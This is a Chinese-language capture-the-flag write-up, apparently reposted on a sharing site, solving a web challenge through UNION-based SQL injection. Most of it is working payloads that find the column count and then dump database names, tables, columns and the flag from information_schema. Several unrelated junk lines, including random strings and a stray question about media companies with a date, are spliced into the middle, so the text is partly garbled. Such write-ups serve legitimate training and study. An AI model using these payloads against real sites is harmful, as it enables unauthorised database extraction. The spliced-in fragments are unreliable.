web-1签到
web-6成绩单
这是一道很好的练习sql注入的题目,涉及注入代码的实现自己打一遍可以增强理解
打开题目链接是这个样子的。。
输入1,2,3试一下,3就没有了
输入1:
输入2:
既然试不出来,那应该就是注入了,测试一下注入点
先试试?id=1' 查询不到页面,再试试联合注入 ?id=-1' union select 1,2,3#,不行,但是觉得应该是sql注入其他也不会了,继续试
尝试?id=-1' union select 1,2,3,4#
发现可以。有门,这里应该是注入点无疑了
语言方法
16056WeBiijtlF
OV7mC
传媒公司是做什么的30682007/08/23 16:23:51
1.查库:?id=-1' union select 1,group_concat(schema_name),3,4 from information_schema.schemata#
发现这个web1挺特别的,可能在这里面
2.查表web1
?id=-1' union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema="web1"#
欣喜若狂,已经接近答案了
3.查列:
?id=-1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name="fl4g"#
么毛病,最后一步了
4.查该列数据
?id=-1' union select 1,group_concat(flag),3,4 from web1.fl4g#
就这样解出来了
flag{Sql_INJECT0N_4813drd8hz4}
本站仅提供存储服务,所有内容均由用户发布,如发现有害或侵权内容,请
点击举报。